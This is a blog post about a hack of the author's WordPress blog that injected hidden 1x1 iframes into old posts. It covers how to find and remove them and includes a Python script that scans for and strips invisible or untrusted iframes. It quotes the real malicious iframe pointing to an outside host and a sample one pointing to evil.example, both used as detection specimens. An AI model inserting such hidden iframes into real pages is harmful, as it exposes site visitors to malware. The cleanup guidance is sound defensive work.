Two of my old posts at my geekblog Haibane.info dating from November 2007 had some injected HTML code in them. The injected code read as follows:
<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->
I only became aware of it when Google flagged my archives for that month as “malicious”. Viewing the source of the archives page revealed the hack – probably from some window of time in which I hadn't upgraded to the latest WordPress version.
To check whether any of your older posts still carry this injection, search your posts for the term “iframe” and open the matches in the HTML editor rather than the visual editor: a 1x1 frame renders as nothing visible, but the tag is plain to see in the source. You will very likely find code similar to the above; delete the injected markup (including the “Traffic Statistics” comments wrapped around it) and save the post. If you have database access, searching post_content in the wp_posts table for the same term is a quicker way to check every post at once.
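As an added example (not code from the original post, and not a WordPress tool), here is a small Python script that performs the same check offline against post HTML. It flags iframes that are effectively invisible (0 or 1 pixel wide or tall) or whose src host is not on an allowlist, and strips the flagged ones together with the decoy “Traffic Statistics” comments. The sample posts, the TRUSTED_IFRAME_HOSTS allowlist and all function names are constructed for this example; against a live site you would feed it post_content rows selected from wp_posts instead of SAMPLE_POSTS.

```python
import re
from urllib.parse import urlparse

# Constructed sample posts for the example (not content from the real blog).
# Post 2 carries the same kind of hidden 1x1 iframe the article describes;
# post 4 shows an unclosed, upper-case variant that a naive search might miss.
SAMPLE_POSTS = {
    1: '<p>Normal post with a <a href="http://example.com">link</a>.</p>',
    2: ('<p>Old post from November 2007.</p>\n'
        '<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/'
        'iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> '
        '<!-- End Traffic Statistics -->'),
    3: ('<p>Embedded video:</p>'
        '<iframe src="https://www.youtube.com/embed/abc" width=560 height=315></iframe>'),
    4: "<p>Another post.</p><IFRAME SRC='http://evil.example/x' WIDTH=0 HEIGHT=0>",
}

# Assumed allowlist of hosts you knowingly embed; frames from anywhere else are flagged.
TRUSTED_IFRAME_HOSTS = {"www.youtube.com"}

# Match an <iframe ...> start tag and, when present, its content and closing tag.
# The closing part is optional so an unclosed injected tag is still found.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>(?:.*?</iframe\s*>)?", re.IGNORECASE | re.DOTALL)
# Attribute parser that accepts the unquoted values the injection uses (src=http://...).
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")
# The comment wrapper the injection hid behind.
DECOY_COMMENT_RE = re.compile(r"<!--\s*(?:End\s+)?Traffic Statistics\s*-->", re.IGNORECASE)


def parse_attrs(attr_text):
    """Return a dict of lower-cased attribute names to unquoted values."""
    return {name.lower(): value.strip("\"'") for name, value in ATTR_RE.findall(attr_text)}


def _pixels(attrs, name):
    """Width/height as an integer pixel count, or -1 when absent or not a plain number."""
    raw = attrs.get(name, "").strip().lower()
    if raw.endswith("px"):
        raw = raw[:-2]
    return int(raw) if raw.isdigit() else -1


def is_suspicious(attrs, trusted_hosts=TRUSTED_IFRAME_HOSTS):
    """Flag frames that are effectively invisible or that load from an untrusted host."""
    hidden = any(0 <= _pixels(attrs, dim) <= 1 for dim in ("width", "height"))
    host = (urlparse(attrs.get("src", "")).hostname or "").lower()
    return hidden or host not in trusted_hosts


def scan_post(content, trusted_hosts=TRUSTED_IFRAME_HOSTS):
    """List the suspicious iframes found in one post's HTML."""
    findings = []
    for m in IFRAME_RE.finditer(content):
        attrs = parse_attrs(m.group(1))
        if is_suspicious(attrs, trusted_hosts):
            findings.append({"src": attrs.get("src", ""), "tag": m.group(0), "offset": m.start()})
    return findings


def scan_posts(posts, trusted_hosts=TRUSTED_IFRAME_HOSTS):
    """Map post ID -> findings for every post that has at least one suspicious iframe."""
    report = {}
    for post_id, content in posts.items():
        findings = scan_post(content, trusted_hosts)
        if findings:
            report[post_id] = findings
    return report


def clean_post(content, trusted_hosts=TRUSTED_IFRAME_HOSTS):
    """Remove suspicious iframes; if any were removed, also drop the decoy comment wrapper."""
    def replace(m):
        return "" if is_suspicious(parse_attrs(m.group(1)), trusted_hosts) else m.group(0)

    cleaned = IFRAME_RE.sub(replace, content)
    if cleaned != content:
        cleaned = DECOY_COMMENT_RE.sub("", cleaned)
    return cleaned


if __name__ == "__main__":
    for post_id, findings in scan_posts(SAMPLE_POSTS).items():
        for f in findings:
            print(f"post {post_id}: suspicious iframe src={f['src']!r} at offset {f['offset']}")
        print(f"post {post_id} cleaned: {clean_post(SAMPLE_POSTS[post_id])!r}")
```

The allowlist is the important knob: a legitimate embed (post 3) passes because its host is trusted and it has a visible size, while the injected frame fails on both counts. Review the report before applying clean_post to anything, since an iframe you forgot to allowlist will be stripped too.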
WordPress has come a long way in making upgrades easier with one click (though some people still run into problems on occasion). I think it would be better if WP had an incremental and automated upgrade process whereby whenever a security-related update was available, you could have it automatically install, just as you can in Windows. Ideally, this would be controlled by a setting in the Dashboard to “turn on/off automatic security patches” and, when enabled, would “register” your blog with the mothership at wordpress.org so that whenever a security patch is available, you get an automatic email to your admin email account notifying you, and when you next log in to the Dashboard the patch is automatically applied.